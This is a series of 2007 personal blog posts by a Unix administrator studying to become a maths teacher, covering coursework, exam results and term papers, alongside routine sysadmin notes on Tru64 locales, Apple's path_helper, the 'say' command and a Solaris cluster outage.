You see, over the past few years the Netherlands have seen quite a few changes to their educational system. One of the big-ass ones, is the move from class-based education, towards a more individual approach. If you're interested, we're discussing the matter over here, at Ars Technica.

Among other tasks, each group member is expected to pay a visit to a New Learning school. I decided to be a little off-beat and opted for a democratic school (which are actually quite rare in the NL): De Kampanje.

The talk I had with one of their staff members was rather educational. I will probably never see eye to eye with them on schooling, but it -is- always interesting to hear new ideas. Such talks allow me to take a step back and take another look at the work I'm doing myself.

De Kampanje bases most of their work on steps that have already been taken by the Sudbury Valley School in the US. Most of their ideas really are quite daring and I'm sure that 95% of today's educators would be infuriated even thinking of them.

For now I will refrain from fully forming an opinion on their methods. I still have to write an objective paper in the issue ~_^


kilala.nl tags: ,

View or add comments (curr. 0)

My strategy for this semester and the next

2007-12-08 12:21:00

I'm going to have to fit in various "unwieldy" tasks, that will not fit properly into my normal agenda. Among others, I'm expected to make multiple visits to schools: to talk to students, to teach classes, etc. Given my normal day job this is simply impossible. I've also fallen slightly behind in a few areas, so I'm going to have to shuffle things around to make it all work.

This semester:

* I have to finish last semester's General didactics, or I'm going to fail it completely. That would mean I'd have to completely redo the course next year.

* I've already dropped the maths part of Analysis 1 in order to make room for other stuff.

* I'm going to postpone my work for SLB and WER, after conferring with my teacher. She understood my need to make room in my schedule.

* I will finish both Kijk op leerlingen and Analysis 1 - Didactics on time.

Next semester:

* I'll drop the second year's Counseling and mentoring project, so I can take it next year. That ought to free up enough time to finish this semester's SLB and WER and to tie up any loose ends.


kilala.nl tags: ,

View or add comments (curr. 0)

That's one big feather up my ass!

2007-12-03 22:07:00

Awesome! One of my teacher just gave me a big-ass compliment!

In the first three weeks of the Analysis 1 Didactics course, I'd turned in my first four reports. So far Theo's graded three of them, giving each a 90%.

Today he came up to me to tell me that he thought my work was extraordinary, because of all the extra research I put in. He also wanted to know whether I'd allow him to distribute my reports among his colleagues. He thought they'd be useful, to set an example of what they'd expect of their students.

Hot diggity! ^_^;;


kilala.nl tags: , ,

View or add comments (curr. 5)

Installing additional locales on Tru64

2007-11-28 10:48:00

Wow, that was a fight :/

A few days ago we had a "new" TruCluster installed, running Tru64 5.1b. All of the stuff on it was plain vanilla, which meant that we were bound to run into some trouble. Case in point: the EMC/Legato Networker installation.

Upon installation setld complained as follows:

==========

Your choice:

1 LGTOCLNT999 EMC NetWorker Client

cannot be installed as required subset IOSWWEURLOC??? is not available.

==========

As the name suggests (EURLOC) the missing files involve the additional European locales that are not part of the default installation.

After fighting and searching and swearing a lot I got things sorted out as follows:

1. Get the Tru64 CD-ROM that was used for the installation. You'll need the "Associated Products 1" CD.

2. Insert the CD into your system.

3. Mount the CD: mount -r /dev/disk/cdrom1c /mnt

4. cd /mnt/Worldwide_Language_Support/kit

5. setld -l `pwd` IOSWWEURLOC540

This will install the locale I needed. Of course you are free to substitute the names of other locales as well.

EDIT:

Also, feel free to read through the proper instructions.


kilala.nl tags: , , ,

View or add comments (curr. 1)

A different kind of hacking

2007-11-25 22:40:00

You know? This whole college deal, burning the midnight oil over homework, feels like hacking to me. It gives me the same feeling I had during my internships or during late-night projects at the office. A feeling that I'm completely into what I do and that I want to keep on going.

Case in point: tonight I'm working on a report for Analysis 1 - Didactics, scratching away at my whiteboard. And of course I turn to the music I always play at times like these.

If you're curious, the song's Funky doll from the original Bubblegum Crisis soundtrack.

It's awfully eighties, but there's something I just love about that song. Of course, I'm also glad there was no video camera there to register my gay-ass dancing at the board. There's just something weird about a geek dancing, while working ^_^;


kilala.nl tags: , ,

View or add comments (curr. 0)

Yay, for more results

2007-11-19 23:29:00

Yay for more test results :)

Remember that one report that had me worried so much? Well, it came back a 70% so it wasn't all bad :)

Also, that one test I was waiting for (on General didactics) came back a whopping 80%! Awesome!


kilala.nl tags: ,

View or add comments (curr. 2)

path_helper: sometimes Apple does kludgy, stupid things

2007-11-18 15:24:00

I've always been quite happy about most of the stuff Apple does. A lot of their solutions to problems are elegant and pretty. However, there are also some cases in which they do awful stuff under the hood. Stuff that makes me cringe in disgust.

Case in point, the new path_helper command.

I've been an avid user of LaTexIT, a LaTex helper programme, for a few months now. It's great how easy it makes the creation of mathematical equations in LaTex.

Unfortunately LaTexIT doesn't yet work flawlessly on Leopard. One of the things that goes wrong is the fact that it just won't start :D After trying to start the app a few times, I noticed a run-away process called path_helper.

I asked Pierre whether path_helper might be tied to the problems he's having, because we don't often get run-away processes. Pierre confirmed that others have hinted at path_helper as well, but that he isn't quite sure yet. Unfortunately he doesn't have a Leopard license yet, so he can't debug the problems yet (hint: make a donation if you use LaTexIt! Pierre could use a Leopard license!).

To help him out, I dug around a little bit. What follows is what I e-mailed Pierre. If you don't want to read through the whole bit, here's the summary:

Apple wants to make it easy to expand the $PATH variable for every user on the system automatically. Instead of tagging on new PATH= lines onto the end of /etc/profile, they've created the path_helper command that gets called by /etc/profile. Path_helper reads directory paths from the text files in /etc/paths.d and appends these paths to $PATH.

So because the want to make it just a -little- easier to add to $PATH, they've:

* Created a new directory structure under /etc/paths.d

* Allow new apps or environments to add text files to /etc/paths.d

* Created a new command which simply reads text files and barfs out shell commands.

* Thus broken the Unix standard way of globally setting $PATH.

Good going Apple! You bunch of schmucks!

======================================================

Hmm, this seems to be a weird little, extra tool that Apple has tagged onto the OS. I'm not sure if it's the most elegant solution to the problem. I see what they want to do though: they want to be able to easily make adjustments to the $PATH variable for all users on the system.

Personally I'd just use the global profile in /etc, but apparently Apple have chosen a roundabout way.

Each user's .profile calls that path_helper process. The only thing that path_helper does is generate the requisite sh/csh commands to adjust the $PATH variable.

From the manpage:

=====================

ath_helper(8) BSD System Manager's Manual path_helper(8)

NAME

path_helper -- helper for constructing PATH environment variable

SYNOPSIS

path_helper [-c | -s]

DESCRIPTION

The path_helper utility reads the contents of the files in the directories

/etc/paths.d and /etc/manpaths.d and appends their contents to the PATH and

MANPATH environment variables respectively.

Files in these directories should contain one path element per line.

Prior to reading these directories, default PATH and MANPATH values are

obtained from the files /etc/paths and /etc/manpaths respectively.

Options:

-c Generate C-shell commands on stdout. This is the default if SHELL

ends with "csh".

-s Generate Bourne shell commands on stdout. This is the default if

SHELL does not end with "csh".

NOTE

The path_helper utility should not be invoked directly. It is intended only

for use by the shell profile.

Mac OS X

END

=====================

So instead of putting PATH=$PATH:/usr/whatever/bin in /etc/profile, Apple have decided to make a new config file: /etc/paths.d. This config file will list all directories that need to be appended to the default $PATH.

/me looks at /etc/paths.d

Actually... It's a directory, containing text files with directory paths. For example:

=====================

Kilala:~ thomas$ cd /etc

Kilala:etc thomas$ cd paths.d

Kilala:paths.d thomas$ ls

X11

Kilala:paths.d thomas$ ls -al

total 8

drwxr-xr-x 3 root wheel 102 24 sep 05:53 .

drwxr-xr-x 91 root wheel 3094 13 nov 21:11 ..

-rw-r--r-- 1 root wheel 13 24 sep 05:53 X11

Kilala:paths.d thomas$ file X11

X11: ASCII text

Kilala:paths.d thomas$ cat X11

/usr/X11/bin

=====================

I guess Apple's reasoning is that it's easier to add extra text files to /etc/paths.d, than it is to add a new PATH= line to /etc/profile. Personally, I think it an in-elegant (and rather wasteful) way of doing things :/

Wait, it's even worse! The path_helper gets called from /etc/profile! Ugh! :(

=====================

Kilala:~ thomas$ cd /etc

Kilala:etc thomas$ cat profile

# System-wide .profile for sh(1)

if [ -x /usr/libexec/path_helper ]; then

eval `/usr/libexec/path_helper -s`

fi

if [ "${BASH-no}" != "no" ]; then

[ -r /etc/bashrc ] && . /etc/bashrc

fi

=====================

Let's see what happens when I run the command...

=====================

Kilala:etc thomas$ /usr/libexec/path_helper -s

PATH="/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin:/usr/X11/bin"; export PATH

MANPATH="/usr/share/man:/usr/local/share/man:/usr/X11/man"; export MANPATH

=====================

What a totally stupid and annoying way of doing this. What's worse, I'm quite sure it also breaks the Unix-compliancy of Leopard when it comes to standards for setting $PATH.

Hmm :/


kilala.nl tags: , , ,

View or add comments (curr. 12)

Ouch, Analysis-1 is going to be a toughy

2007-11-17 11:55:00

Careful now, this may sting a little... o_O

This semester we're covering Analysis 1, which requires a wholly new way of thinking. Where Statistics 1 was pure maths and calculation, this course requires something additional: insight and a sense of logic.

The thing about this course is that it's all about proving maths. Not using maths to prove stuff, but proving the mathematic equations themselves.

Folks who aren't too hot on math may want to skip the next section :D

==========

For example, the calculation show is above belongs to the question "Prove or disprove that (k^2 -1) is divisible by eight, for all values of K that are integers and odd". "Odd" in this case is opposed to "even".

So, how do you even get started on such a question?! Well, you start filing in bits and pieces, starting out by equating k to (2n + 1). Why? Because one can make -any- odd number by taking integer n, multiplying it by 2 (thus becoming an even number) and then adding 1.

Once all of that is done we're left with 4(n^2 + n). In order for the original theory to be right, this'd mean that any value of (n^2 + n) needs to be even. And that's what I'm testing in the second and third lines: first for even numbers, then for odd numbers. And indeed, both tests come out positive: any value for n will result in an even number.

Pulling this back to the original theory means that any outcome is indeed divisible by eight, because four times any even number is always divisible by eight.

==========

Joy!... I've always sucked at being insightful, so a lot of these "tricks" don't come natural to me. Then again, I used to get good grades for math and even for stuff like this. I ought to be able to get the hang of it again.

I hope ^_^;;


kilala.nl tags: , , ,

View or add comments (curr. 1)

Return of the Word 2004 FontCacheTool troubles

2007-11-15 19:09:00

Darn... Fighting this little bit of trouble just cost me half an hour and a good chunk of my mood.

After installing the OS X 10.4.11 update, the MS Word 2004 FontCacheTool problems I had back in 2006 arose again. Apparently this part of MS Office regularly gets into trouble with OS X's fonts and caches *grr*

I tried to get rid of the problem in a nice way by disabling any duplicate fonts and by removing the font cache. But that didn't help me any. So instead I reckoned I'd play it dirty; I didn't have time to play with Word.

$ cd /Applications/Microsoft*/Office/Support*

$ sudo mv FontCacheTool FontCacheTool.orig

Screw that piece of kit... If it doesn't want to play nicely, it won't get to play at all. Of course, that's not the proper solution. On the upside of things, Word does boot up very quickly now! ^_^;


kilala.nl tags: , ,

View or add comments (curr. 0)

How do you make grownups re-learn basic maths?

2007-11-15 13:20:00

This semester, the didactics course that's part of Analysis 1 focuses on the teaching of basic maths to children. What kind of troubles do they run into? What are common mistakes they make? How does learning maths even work?!

Of course it's a bit hard for a bunch of grownups to sympathize with the issues kids run into. Adults have been calculating things in their heads for decades and everything's become an autoamtic process.

8 + 5? The answer "13" automatically pops up in my head. No need to even think about it. 2 x 20? Boom! "40".

So how do you make adults relive their days of learning basic maths?

By making them do maths in base-8, ie octal counting.

Using the classic method known as the Land of Okt (het land van Okt), aspiring teachers are introduced to the problems of learning maths. We're using a book published by APS, though there's also a book dedicated to this specific subject.

I have to say that it's an interesting and somewhat frustrating experience. It feels odd break down addition and multiplication into steps again. Ie: 3 + 9 = 3 + 5 + 4 = 14. Or: 4 x 5 = 2 x 12 = 24. Don't even get me started about fractions :D

Yeah... Good stuff! If you're curious to see some of the assignments we're doing, check the Wiki page for week 1.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Microsoft Sharepoint: collaborating on documents

2007-11-14 17:17:00

A dutch translation of this page, can be found here, on my Wiki.

During my second semester at Hogeschool Utrecht I got into my first group assignment. The five of us had to work together on a project for Kijk op Leerlingen 1, which is a course focussing on student identity and psychology.

School expects us to store all of our reports and materials on a dedicated Sharepoint site. Now, you know that when multiple people start working on the same documents, that things are going to get messy. So in order to prevent mayhem, I've created a short HOWTO for my project buddies.

Making sure you don't work on the same thing, at the same time.

With software like Sharepoint it's very easy to start mixing up versions of documents. For example, let's say that both Badegul and Arjan have downloaded the file called Foobar.doc. Both of them are making changes to the document on their own computers. First Arjan uploads the new document to Sharepoint. Then Badegul does the same.

Now there's a problem! Because all the work that Arjan has done, has now been overwritten by Badegul's document. All of his work is lost. Of course, it's still stored on his own computer, but that's besides the point.

In order to prevent multiple people from working on the same document, at the same time, here are some simple rules. All of this is explained in the video below.

  1. Never continue working from a document on your computer. Always download a new version from Sharepoint.
  2. Before you start working on the document, use the "checkout" command.
  3. The only one who can make changes to the Sharepoint version of the document, is the one who checked out the file.
  4. After you're done working on the document, upload a new version.
  5. After uploading the new file, "checkin" the file so others can work on it.
  6. If a document is already checked out, DO NOT start working on it! Contact the person who's checked out the document, to see when he/she is done with it.

One of the risks in working this way is that one person can keep a file locked indefinitely. So please, keep an eye out! If you're done working for now, please upload your file and check it in. Don't keep a document checked out, unless you're really working on it.

Click here to open or download the movie.

What if you need to work on the same document together?

If you're in a situation where multiple people need to work on the same document, then things get interesting.

Put one person in charge of the document; this is the person who'll do the checkout and checkin. Now everyone can start working, BUT with one difference. The person in charge has the document itself. All the others only send their -changes- to this person. Thus, they tell the person in charge exactly what needs to be changed and where.

The person in charge then gathers all the changes into the main document and uploads the new version to Sharepoint.


kilala.nl tags: , , ,

View or add comments (curr. 0)

More test results have come in

2007-11-12 23:38:00

Hooray for more good results!

It's been confirmed that the first result that I got back (see a few days ago) was actually an 8,3! /o/ That's the equivalent of an 83%. Nice!

And the reports I'd turned in for Statistics 1 (all of which can be found over here) were also good for a G (and hence an 8, or 80%). Fsckin' A!


kilala.nl tags: ,

View or add comments (curr. 5)

First exam result is in

2007-11-11 10:00:00

I just checked Osiris (my school's online student administration site) and found my first test result.

Statistics 1 came back a G, which is equivalent to a 7, or a 7,5 if I'm not mistaken. My expectations were spot on :)


kilala.nl tags: ,

View or add comments (curr. 3)

Here I go: my first exams in college

2007-11-05 09:57:00

My calculator, my pens, my reports and my summaries.

So... Exciting day! Today's the first time I'm taking exams for my new college education. Of course I've done all of this before, but that was years ago!

I've got two tests scheduled for today:

* 1200 - 1400 = Statistics 1.

* 1800 - 2000 = Didactics 2.

So yeah, I've got four hours of wasted time in between my tests. I'll use that to go through the summaries some more and to relax a little.

Well, here I go ^_^ Faito!


kilala.nl tags: , ,

View or add comments (curr. 2)

Leopard and new text-to-speech voices

2007-11-04 10:49:00

A small forum discussion at Ars Technica alerted me to one of the new features in OS X Leopard. Apple'd been working on a more lifelike voice-over, which resulted in the voice Alex. I have to say that it's pretty damn impressive, the way they make Alex sound rather lifelike.

What's even scarier is the fact that somehow Apple worked in little breathing-effects as well. There's something weird about hearing your computer draw breath before it starts to speak a sentence.

EDIT:

You can use the voice-over utilities to create audio files as well. Cheap audio-books anyone? Of course, Alex doesn't speak as vividly as any other narrator, but still.

Here's how to do it:

1. Open Terminal.app to get to the command line.

2. Type "say -f ".

3. Drag a plain text file from Finder into the Terminal window.

4. Type " -o ~/Desktop/Spoken.aiff"

5. Press enter.

The say command will read the text input file (-f flag stands for "file") and will output the audio as .AIFF file (-o stands for "output"). The resulting file will appear on your desktop. Once it's done you can convert the .AIFF file to .MP3 using Amadeus.

EDIT2:

Of course, another neat use for this command is to tell you when a huge task is done. For example, I run the "TEC-analysis.sh" script from the command line to analyse a weeks worth of Tivoli alarms. It'd be very easy to do the following:

$ ./TEC-analysis.sh; say TEC Analysis complete!


kilala.nl tags: , ,

View or add comments (curr. 4)

Leopard upgrade, part 1: Powermac

2007-11-03 15:44:00

My new Leopard desktop

Last night I upgraded the first of our three Macintoshes to the new Mac OS X Leopard. I'd decided to start out with the Powermac, since that one's the least crucial of our Macs. Before upgrading her iBook, Marli wants to see the new OS work on my Powermac. And of course I'm saving the all-important work-Macbook for last.

The installation was -not- without problems. I'd forgotten that I'd installed APE (Application Enhancer), which royally screws up any new Leopard install. This isn't that farfetched, since it's a rather hackish piece of software.

After doing a completely fresh, reformatted, install I found another unpleasant surprise: the Migration Assistant software cannot import users whose homedirectory has been File Vaulted. Crap. This meant that I had to transfer all my files and preferences by hand.

So far I like the new OS well enough (haven't noticed much difference), though there's one thing that I already loathe: Spaces. I -love- having a virtual desktop manager built into OS X. Absolutely. I just hate two of the "features" of Spaces.

1. You cannot move windows from one desktop to another using a key combo.

2. Spaces automatically switches to the desktop containing the -main- window of the application you select.

Why is number 2 so bad? Well, let's say that I'm typing up a report on desktop 4. Now a friend pops up on MSN, through Adium. The new Adium window appears on my current desktop: 4. I switch to Adium, to type a reply, and "zing!" I'm moved to desktop 2 because that's where Adium's main window resides.

That fscking sucks!

More Leopard gripes later :)


kilala.nl tags: , ,

View or add comments (curr. 0)

All my term papers for Didactics 2 (Vakproject Vakdidactiek 2)

2007-11-02 11:51:00

I assume that it's Hogeschool Utrecht's philosophy to start their students off with basic knowledge that can be applied in practice, followed by years of more advanced information. This methodology has irked quite a few of my classmates, but I really don't mind. I actually quite like it.

One of the more advanced courses (it's a second year's class) is Vakproject Vakdidactiek 2 (General & Maths didactics 2). This course is divided into two separate streams: one covering general didactics for the complete n00bs (like me) and one covering didactics in maths. The first stream is finalised with an exam, while the second stream requires the student to write a full dozen (12!!!) reports.

I have already written summaries on general didactics, which can be found on this page and on this page. The page you're currently browsing features -all- of my term papers for the maths didactics part.



Dossier opdracht 1

At the start of this second year's course we are asked what we believe makes a "good" maths teacher. We are asked to analyse our own strengths and weaknesses, so we can form goals for ourselves.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 2

This report is based on BIT-report 1. What's different is that dossier opdracht 2 also contains my description of the lessons I've drawn from the course material.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 3

We've already discussed direct instruction on earlier occasions (BIT-report 1). For this assignment, students are expected to design a class plan on the subject of the Pythagoras theorem.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 4

After working on dossier opdracht 3, students are asked to review each other's work in pairs. Report 4 contains the feedback that I've given one of my class mates.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 5

Term paper 8 requires that I spend some time teaching a class. Unfortunately I haven't been able to do that yet. Hence, there's no paper for you to review.



Dossier opdracht 6

This one's a huge one, weighing in at around thirty pages! We are asked to take an exam that's been handed out in class and turn it inside out. What's wrong with it? What's good about it? How would you grade the paper?

We are also given five tests as they were turned in by students. What did they do right? Where did they go wrong? Can you understand why they made certain mistakes?

This was a very interesting assignment, but IMHO it was just too fscking huge. I sank at least thirty hours into this report.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 7

Term paper 7 requires that I spend some time teaching a class. Unfortunately I haven't been able to do that yet. Hence, there's no paper for you to review.



Dossier opdracht 8

Term paper 8 requires that I spend some time teaching a class. Unfortunately I haven't been able to do that yet. Hence, there's no paper for you to review.



Dossier opdracht 9

This assignment focusses on the problems high school students may encounter when using the dutch language. Students are asked to read and analyse a few chapters on this matter.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 10

This assignment focusses on the problems high school students may encounter when using the dutch language. The object is to analyse an assignment that would've been used on an exam, to find its flaws and to rewrite it.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 11

This assignment focusses on cooperative learning, as pioneered by Dr. Spencer Kagan. It contains a summary of relevant chapters from our course books, as well as a BIT reading report.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 12

This assignment focusses on cooperative learning and takes a look at Wiki's as a learning tool.

This document is available as a .PDF document and can be downloaded here.


kilala.nl tags: , , ,

View or add comments (curr. 0)

All my term papers for Statistics 1 (Statistiek - Vakdidactiek)

2007-11-02 10:30:00

The first year at Hogeschool Utrecht's study Tweedegraads docent wiskunde starts you off with a course in statistics. They could've picked any part of math to start out with, but it was this one :)

The course, Statistics 1, is divided into two classes: one dealing with the actual maths, the other dealing with the didactics involved with teaching statistics. The first class ends with an exam, while the second requires you to hand in a total of eight papers (called dossier opdrachten. This page serves as a portal to all eight of my reports.



Dossier opdracht 1

As their first assignment of the year, students are asked to investigate how statistics are taught in high school. We are asked to focus on the first three years of HS, thus limiting the scale of the job.

Each student picks one specific method and searches through all the books for those three years. Any mention of statistics should get a little footnote, while whole chapters on statistics deserve a thorough analysis. For my report I picked the Getal en ruimte method.

This document is available as a .PDF document and can be downloaded here. Be aware that the file is a whopping 10MB, due to the heavy use of images.



Dossier opdracht 2

In a similar light as the first paper, students are asked to investigate the final terms for statistics. The VMBO have a list with specific subjects from statistics that should be featured in the exams. We are asked to pick one assignment per subject from the method we used for the first paper.

This document is available as a .PDF document and can be downloaded here. Be aware that the file is a whopping 6MB, due to the heavy use of images.



Dossier opdracht 3

One of the many philosophies in teaching is direct instruction (directe instructie). One of the key principles of this philosophy is that one should keep student motivated. Motivated students are willing to accept education and will thus learn more efficiently. For more information on direct instruction, read BIT-report 1 on maths didactics.

In order to grasp students' attention it's good to start a class with a bang. We were asked to write three separate opening sessions (15 minutes each), which can be used in a class on statistics. One of these openings will be presented in class. For a report on these presentations, read my class notes for weeks 3 through 5.

My class openings use the following subjects:

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 4

After giving the presentation mentioned with dossier opdracht 3, each student is given feedback by his classmates. Feedback is gathered through forms created by the student and through forms handed out by the teacher.

Dossier opdracht 4 gathers all the feedback into one report, for analysis. It's expected that I use this report as a guideline for future learning goals.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 5

In teaching statistics, schools often make a grab for software like MS Excel and VU Stat (or SPPS). For this report, students are asked to investigate the capabilities of these tools and to assess their usefulness in teaching statistics.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 6

For paper 5 we researched software that runs on the local computer, like Excel and VU Stat. With paper 6 we are asked to research online tools. One may not expect this, but there are a few websites out there that offer schools online learning suites.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 7

The students are asked to investigate GWAs. In this case, GWA stands for Geintegreerde Wiskunde Activiteit (Integrated Maths Activity). The idea behind GWAs are that they're supposed to help students discover the place math has in daily life.

GWA assignments pose the student a problem and give no hints as to the required theory. A student is expected to figure things out by himself. He'll need to discover which pieces of theory are required and how he should combine them.

Our investigation quickly glances over the how-and-why of GWAs. One of the most important conclusions of the report are five characteristics that a "good" GWA should have.

This document is available as a .PDF document and can be downloaded here.



Dossier opdracht 8

As you may have read, dossier opdracht 8 gave me quite a bit of trouble.

The students are asked to create a GWA for students in their first, second or third year of high school. My report covers a GWA on electronic payments (electronisch betalen).

This document is available as a series of three .PDF documents. Part 1. Part 2. Part 3.


kilala.nl tags: , , ,

View or add comments (curr. 2)

W00t! New books have arrived.

2007-10-31 20:22:00

Three new books and a pamphlet

This year's second semester will start in about a week. In preparation for my new courses I've been ordering books left and right. Luckily I already own the most expensive book on the list, so I won't have to get that one.

On the pile on the left you see:

* Identity development and student counseling

* Maths for students between 12 and 16

* Teaching effectively: learning maths

* A pamphlet entitled Don't touch me!

The last two items weren't on the official book list, but I decided to get them anyway. Learning maths because it will make a nice addition to my current library. Don't touch me! because I am very curious how one would handle a situation where kids are harassed by others.

This leaves two syllabi that I should buy at school. After that I'm all set.


kilala.nl tags: , , , ,

View or add comments (curr. 4)

A summary of "Lesgeven en zelfstandig leren"

2007-10-27 14:16:00

In my first year at Hogeschool Utrecht I will follow a few second year's courses, to speed up my studies. One of these second year courses is Project Vakdidactiek, which concerns the didactics behind teaching maths.

As part of this course we are also required to take a test labeled Algemene didactiek (general didactics). This test is based on materials we study in Vakdidactiek, but also on the book Lesgeven en zelfstandig leren, by Geerlings and Van Der Meer.

As part of my preparation for this exam I've composed a summary of the three relevant chapters.

My summary is compiled as a 30+ .PDF document. You can download my summary here.

We are also required to read parts of Leren op school, by C.F. van Parreren. As an aside we have also covered various learning styles as defined by American psychologist Kolb.

This summary is also available as a .PDF document. You can download my summary here.


kilala.nl tags: , ,

View or add comments (curr. 0)

Sometimes clusters do not guarantee high uptime

2007-10-20 13:36:00

Oh me, oh my... Clustering software does not always guarantee high uptime :/

At $CLIENT we've been having some nasty problems with our development SAP box. The box is part of a Veritas cluster and actually runs a bunch of Solaris Zones. The problems originally started about two months ago when we ran into a rare and newly discovered bug in UFS. It took a while for us to get the proper patches, but we finally managed to get that sorted out.

Remco installed the patches on Thursday morning, though he ran into some trouble. As always, patches can give you crap when it comes to cross-dependencies and this time wasn't any different. Around lunch time we thought we had things sorted out and went for the final reboot. All the zones were transferred to the proper boxen and things looked okay.

Until we tried to make a network connection. D:

None of the zones had access to the network, even though their interfaces were up and running. We sought for hours, but couldn't find anything. And like us, Sun was in the dark as well. In the end Remco and Sun worked all night to get an answer. Unfortunately they didn't make it, so I took over in the morning. Lemme tell you, once I was in the middle of all the tech and the phone calls and the managers, I found some more respect for Remco. He did a great job all through Thursday!

Just before lunch both Sun and one of the other guys came up with the solution. That was an awesome coincidence :) Turns out that the problems we were having are caused by timing issues during the boot-up of the Solaris Zones. Because we let Veritas Cluster handle the network interfaces things turned sour. Things would've worked better if we'd let the Zone framework handle things.

The stopgap solution: freeze all cluster resources to prevent fail-over, then manually restart all virtual interfaces for the zones. And presto! It works again!

Happily we went to lunch, only to come back to more crap!

Turns out that the five SAP instances we were running wouldn't fit into the available swap space anymore. Weird! Before yesterday, things would barely fit in the 30GB of swap space. And now all of a sudden SAP would eat about 38GB! o_O WTF?!

A whole bunch of managers wanted us to work through the whole weekend to sort everything out. Naturally we didn't feel to enthused, let alone the fact that the box's SLA doesn't cover weekend work.

In the end we tacked on some temporary swap space, started SAP and left for the weekend. We'll have to take more downtime on Monday for granted. It also leaves us with two big things to fix:

1. Modify the cluster/zone config for the network interfaces.

2. Find out why SAP has grown gluttonous and fix it.


kilala.nl tags: , ,

View or add comments (curr. 1)

A summary of "Statistics 1"

2007-10-14 11:06:00

Statistics seems to be one of the least liked subjects among students taking maths as part of their curriculum. This seems to be the same in both high school and college. I'm not entirely sure why this is, but I've heard a lot of people call the subject matter vague and the rules fuzzy.

The HU must've thought it'd be good to start off with this tough subject, 'cause that's what they dropped on us for the first semester :) STAT1-VAK is one half of the Statistics course, the other half of the course focussing on didactics. STAT1-VAK is closed off with a test of three chapters on statistics, taken from the Moderne Wiskunde books.

This summary focuses on the following chapters from the Moderne Wiskunde books.

You can download the summary as a PDF document.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Freemind: free mind mapping software for all OSes

2007-10-09 09:45:00

A certain colleague of mine has been trying to get us on the mind mapping band wagon for months now. He uses mind maps to take notes, to organise his project and lord only knows what else. I've held off on mind maps so far, thinking them to be the latest fad in productivity enhancement.

First off, mind maps are graphical representations of a thought, concept or idea that can be quickly cobbled together. They work by associating new words and ideas to the ones already on paper. So for example, if the central idea is "paper" you may get branches like "material", "writing" and "printing", which may also have branches of their own. Mind maps allow you to brainstorm about a lot of ideas and to quickly take notes of the process.

Yesterday in class we created a mind map about cooperative learning (samenwerkend leren). I've recreated the mind map using Freemind and the result can be seen here.



Free mind mapping software

To create the mind map linked above I've used the free and open source tool FreeMind. This software can be used on both Windows, Mac OS X and Linux, which makes it perfectly suitable for students. Of course the price is right too ;)

Because the software is written in Java it takes a while to start up. Once it's up and running it works like a charm and you will not notice any speed issues.

Editing the mind map is very easy. The software distinguishes children and siblings. A child forms a new branch from the currently selected idea. A sibling creates a new branch in parallel to the currently selected idea (a brother, or sister if you will). These two basic functions are performed using either the TAB or the ENTER key, which makes it trivial to quickly type up a big mind map.

Mind maps that you've created can be exported as either graphical files (JPG or PNG), as HTML or as an Open Office file. Those graphical exports are very useful when you want to include your mind map in either a website, or a printed report.

FreeMind offers a lot of additional options that can make for a very snazzy mind map. There's colours and icons aplenty, most of which the average student won't use anyway.

I'm not onboard when it comes to being hyper-enthused about mind maps, but I can now definitely agree that they're very useful.

You can download FreeMind from their SourceForge page.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Cellphones, blight of any teacher

2007-10-07 13:07:00

I'm researching some high school maths projects online, for Statistics 1. In a few cases some actually useful stuff pops up on YouTube. However, when following a few of the YT links I quickly stumbled upon movie on movie of kids misbehaving in class.

It's not the usual tomfoolery like wisecracking or being allround noisy though. No, it's the constant mucking about with cellphones that gets to me. Snapping pictures of each other and messing around with the video camera, trying to be as silly or cool as possible. It's horrible how distracting those gizmos can be!

If I can find the time I'll try and read some teachers' fora, see what how the pro's handle cellphones in class. If it were up to me I'd build an EMP box and just fry the lot.

Then again, I should also keep in mind that not every class is going to be like this. It's only the silly, annoying kids that pop up on YouTube :)


kilala.nl tags: , , ,

View or add comments (curr. 3)

A summary of maths didactics

2007-09-26 13:51:00

In my first year at Hogeschool Utrecht I will follow a few second year's courses, to speed up my studies. One of these second year courses is Project Vakdidactiek, which concerns the didactics behind teaching maths.

The final term for this project consists of a dozen reports and assignments, all of which should prove your comprehension of didactics. Materials used in this course include Effectief leren in de les by S. Ebbens e.a. and Wiskundeonderwijs in de basisvorming by APS Publishing.

A few of the assignments require us to make so-called BIT leesverslagen (reading reports). These reports include a summary of the relevant chapters, as well as a chapter covering reflection on the material. On this web page I'll publish the summary sections of these reports. I'll keep the other stuff to myself for now.

Currently, summaries for the following chapters are available.

BIT-report 1

This is part of dossieropdracht 2, which focuses on direct instruction (directe instructie).

You can download the summary as a PDF document.

BIT-report 2

This is part of dossieropdracht 11, which focuses on cooperative learning (samenwerkend leren).

You can download the summary as a PDF document.


kilala.nl tags: , , ,

View or add comments (curr. 0)

The Monty Hall problem

2007-09-22 11:46:00

My white board, with decision trees.

For one of my school assignments I was asked to write three class openings for the subject of statistics. The object of a class opening is to draw in the students, to capture their attention and to motivate them.

The opening I presented at school involved the McNuggets problem (aka the Frobenius problem). It was well received, though most of my class mates thought it better suitable for a class on analytical math. I tend to agree with them now.

One of the other openings I've designed involves the famous Monty Hall problem. The one that involves a gameshow, three doors, two goats and a car. Ring a bell?

Because this problem is so counter-intuitive it tends to throw a lot of people off. Their gut instinct tells them that the chance of winning a car (after revealing one of the goats) should be 50%. They are unfortunately incorrect.

Before we continue, some of you may enjoy a snippet from the TV show Numb3rs. The character of Charlie Eppes doesn't explain the solution very clearly, but does make a nice job of explaining the problem.

Numb3rs-MontyHall.mov

I tried to come to the proper solution by myself by using a decision tree (boom diagram in dutch). It took me a while, but I got there :) My tree looks a bit different from the one Wikipedia shows (linked above), but that's because I use two trees instead of combining them into one.

Going from left to right:

* The original tree, unconstrained, given that you get two choices.

* The gameshow host takes away one of the goats. He asks you whether you want to switch doors.

